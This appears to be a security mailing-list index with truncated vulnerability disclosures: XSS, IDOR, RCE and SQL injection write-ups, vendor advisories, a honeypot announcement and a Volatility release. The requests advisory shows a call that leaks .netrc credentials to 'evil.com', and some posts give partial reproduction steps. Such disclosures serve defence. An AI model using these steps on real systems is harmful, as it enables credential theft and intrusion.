Security News
Stored XSS via File Upload - adaptcmsv3.0.3
Posted by Andrey Stoykov on Jun 03
# Exploit Title: Stored XSS via File Upload - adaptcmsv3.0.3# Date: 06/2025
# Exploit Author: Andrey Stoykov
# Version: 3.0.3
# Tested on: Debian 12
# Blog: https://msecureltd.blogspot.com/
Stored XSS via File Upload #1:
Steps to Reproduce:
1. Login with low privilege user and visit "Profile" > "Edit Your Profile"
2. Click on "Choose File" and upload the following file
html-xss.html
<!DOCTYPE html>...
IDOR "Change Password" Functionality - adaptcmsv3.0.3
Posted by Andrey Stoykov on Jun 03
# Exploit Title: IDOR "Change Password" Functionality - adaptcmsv3.0.3# Date: 06/2025
# Exploit Author: Andrey Stoykov
# Version: 3.0.3
# Tested on: Debian 12
# Blog: https://msecureltd.blogspot.com/
IDOR "Change Password" Functionality #1:
Steps to Reproduce:
1. Login as user with low privilege and visit profile page
2. Select "Edit Your Profile" and click "Submit"
3. Trap the HTTP POST request
4. Set...
Stored XSS "Send Message" Functionality - adaptcmsv3.0.3
Posted by Andrey Stoykov on Jun 03
# Exploit Title: Stored XSS "Send Message" Functionality - adaptcmsv3.0.3# Date: 06/2025
# Exploit Author: Andrey Stoykov
# Version: 3.0.3
# Tested on: Debian 12
# Blog: https://msecureltd.blogspot.com/
Stored XSS "Send Message" Functionality #1:
Steps to Reproduce:
1. Login as normal user and visit "Profile" > "Message" > "Send Message"
2. In "Message" field enter the...
Authenticated File Upload to RCE - adaptcmsv3.0.3
Posted by Andrey Stoykov on Jun 03
# Exploit Title: Authenticated File Upload to RCE - adaptcmsv3.0.3# Date: 06/2025
# Exploit Author: Andrey Stoykov
# Version: 3.0.3
# Tested on: Debian 12
# Blog: https://msecureltd.blogspot.com/
Authenticated File Upload to RCE #1:
Steps to Reproduce:
1. Login as admin user and visit "System" > "Appearance" > "Themes" >
"Default" > "Theme Files" and choose "Add New File"...
Stored XSS in "Description" Functionality - cubecartv6.5.9
Posted by Andrey Stoykov on Jun 03
# Exploit Title: Stored XSS in "Description" Functionality - cubecartv6.5.9# Date: 05/2025
# Exploit Author: Andrey Stoykov
# Version: 6.5.9
# Tested on: Debian 12
# Blog: https://msecureltd.blogspot.com/
Stored XSS #1:
Steps to Reproduce:
1. Visit "Account" > "Address Book" and choose "Edit"
2. In the "Description" parameter enter the following payload...
Multiple Vulnerabilities in SAP GuiXT Scripting
Posted by Michał Majchrowicz via Fulldisclosure on Jun 03
Security AdvisoryVulnerabilities reported to vendor: March 13, 2025
Vendor requested additional information: March 20, 2025
Additional information provided to vendor: March 22, 2025
Vendor confirmed the reported issues but rejected them: March 31, 2025
Additional information provided to vendor: May 6, 2025
Vendor confirmed the reported issues but rejected them: May 15, 2025
Vendor closed the tickets for all reported issues: May 16, 2025
Public...
CVE-2024-47081: Netrc credential leak in PSF requests library
Posted by Juho Forsén via Fulldisclosure on Jun 03
The PSF requests library (https://github.com/psf/requests & https://pypi.org/project/requests/) leaks .netrccredentials to third parties due to incorrect URL processing under specific conditions.
Issuing the following API call triggers the vulnerability:
requests.get('http://example.com:@evil.com/')
Assuming .netrc credentials are configured for example.com, they are leaked to evil.com by the call.
The root cause is...
Exploit CVE-2019-9978: Remote Code Execution in Social Warfare WordPress Plugin (<= 3.5.2)
Posted by Housma mardini on Jun 03
Hi,I am submitting an exploit for *CVE-2019-9978*, a remote code execution
vulnerability in the Social Warfare WordPress plugin (version <= 3.5.2).
*Exploit Title*: CVE-2019-9978: Remote Code Execution in Social Warfare
WordPress Plugin (<= 3.5.2)
*Date*: 2025-05-20
*Exploit Author*: Huseyin Mardinli
*Vendor Homepage*: https://warfareplugins.com/
*Software Link*: https://wordpress.org/plugins/social-warfare/
*Version*: <= 3.5.2...
Youpot honeypot
Posted by Jacek Lipkowski via Fulldisclosure on Jun 03
Hi,I made a novel honeypot for worms called Youpot.
Normally a honeypot will try to implement whatever service it thinks the
attacker would like. For a high interaction or pure honeypot this is often
impossible, because of the thousands of possibilities. Even a simple
telnet server will have thousands of variants: different banners,
different shells, different default passwords, on different IoT devices
etc.
Youpot works around this by...
Re: Typey typey
Posted by Jordan Wiens via Dailydave on May 30
Worth pointing out that the RE//verse videos are also online though I don'tthink we advertised it super well:
https://www.youtube.com/watch?v=yzcNJn_EOwg&list=PLBKkldXXZQhAW5QKjUQOUWaMAHAxDtgio
SEC Consult SA-20250521-0 :: Multiple Vulnerabilities in eCharge Hardy Barth cPH2 and cPP2 charging stations
Posted by SEC Consult Vulnerability Lab via Fulldisclosure on May 27
SEC Consult Vulnerability Lab Security Advisory < 20250521-0 >=======================================================================
title: Multiple Vulnerabilities
product: eCharge Hardy Barth cPH2 and cPP2 charging stations
vulnerable version: 2.2.0
fixed version: Not available
CVE number: CVE-2025-27803, CVE-2025-27804, CVE-2025-48413,
CVE-2025-48414, CVE-2025-48415,...
Structured Query Language Injection in frappe.desk.reportview.get_list Endpoint in Frappe Framework
Posted by Ron E on May 27
An authenticated SQL injection vulnerability exists in the frappe.desk.reportview.get_list API of the Frappe Framework,
affecting versions v15.56.1. The vulnerability stems from improper sanitization of the fields[] parameter, which allows
low-privileged users to inject arbitrary SQL expressions directly into the SELECT clause.
Sample Structured Query Language Injection:
Request:
GET...
Typey typey
Posted by Dave Aitel via Dailydave on May 27
https://www.linkedin.com/mwlite/feed/posts/daveaitel_for-the-offensive-information-professionals-activity-7331470514927865856-<https://www.linkedin.com/mwlite/feed/posts/daveaitel_for-the-offensive-information-professionals-activity-7331470514927865856-yRnO>
yRnO
So I wanted to point this contracting gig out because I think it's a good
opportunity for someone who can do quick vulnerability triage and either
replicate or disprove that...
Announcing the Parity Release of Volatility 3 and the Deprecation of Volatility 2
Posted by Andrew Case via Dailydave on May 27
The Volatility Team is very excited to announce the official ParityRelease of Volatility 3!
This release is not only capable of fully replacing all of Volatility
2’s features, but it also incorporates support for all the latest
operating system versions plus all the latest memory forensics
research.
With this release, Volatility 2 is now deprecated, and its GitHub
project has been archived.
Our announcement blog post details the new...
Re: Typey typey
Posted by Dave Aitel via Dailydave on May 27
https://www.linkedin.com/jobs/view/4233405535/I am bad at links it seems ? Anyways, clicky clicky assuming you are the
type of person who uses Binja for fun and maybe a little bit of profit.
Also here is the OffensiveCon25 Youtube List - it's amazing to me they
managed to get these out so soon.
https://youtu.be/kF31SYIVob8?si=QWPps_--UsILr0mR
-dave
Unauthenticated Blind SQL Injection | RSI queue management system - V 3.0 | CVE-2025-26086
Posted by Shaikh Shahnawaz on May 16
[+] Credits: Shahnawaz Shaikh, Security Researcher at Cybergate Defense LLC[+] twitter.com/_striv3r_
[Vendor of Product]
RSI Queue (https://www.rsiqueue.com/)
[Vulnerability Type]
Blind SQL Injection
[Affected Component]
The vulnerable component is the TaskID parameter in the get request.
[CVE Reference]
CVE-2025-26086
[Security Issue]
An unauthenticated blind SQL injection vulnerability exists in RSI Queue
Management System v3.0 within the...
CVE-2025-30072 Tiiwee X1 Alarm System - Authentication Bypass by Capture-replay
Posted by Sebastian Auwärter via Fulldisclosure on May 16
Advisory ID: SYSS-2025-006Product: Tiiwee X1 Alarm System
Manufacturer: Tiiwee B.V.
Affected Version(s): TWX1HAKV2
Tested Version(s): TWX1HAKV2
Vulnerability Type: Authentication Bypass by Capture-replay
(CWE-294)
Risk Level: CVSS:3.1/AV:A/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:N
Solution Status: Open
Manufacturer Notification: 2025-01-27...
SEC Consult SA-20250506-0 :: Honeywell MB Secure Authenticated Command Injection
Posted by SEC Consult Vulnerability Lab via Fulldisclosure on May 16
SEC Consult Vulnerability Lab Security Advisory < 20250507-0 >=======================================================================
title: Authenticated Command Injection
product: Honeywell MB-Secure
vulnerable version: MB-Secure versions from V11.04 and prior to V12.53,
MB-Secure PRO versions from V01.06 and prior to V03.09
fixed version: MB-Secure v12.53, MB-Secure PRO v03.09
CVE number:...
SEC Consult SA-20250429-0 :: Multiple Vulnerabilities in HP Wolf Security Controller and more
Posted by SEC Consult Vulnerability Lab via Fulldisclosure on May 16
SEC Consult Vulnerability Lab Security Advisory < publishing date 20250429-0 >Combined Security Advisory for Sure Access Enterprise and Sure Click Enterprise
=======================================================================
title: Multiple Vulnerabilities
product: HP Wolf Security Controller / HP Sure Access Enterprise /
HP Sure Click Enterprise
vulnerable version: HP Wolf Security...
SEC Consult SA-20250422-0:: Local Privilege Escalation via DLL Search Order Hijacking
Posted by SEC Consult Vulnerability Lab via Fulldisclosure on May 16
SEC Consult Vulnerability Lab Security Advisory < 20250422-0 >=======================================================================
title: Local Privilege Escalation via DLL Search Order Hijacking
product: Ivanti Endpoint Manager Security Scan (Vulscan) Self
Update
vulnerable version: EPM 2022 SU6 and previous, EPM 2024
fixed version: EPM 2022 SU7 and EPM 2024 SU1
CVE number: CVE-2025-22458...
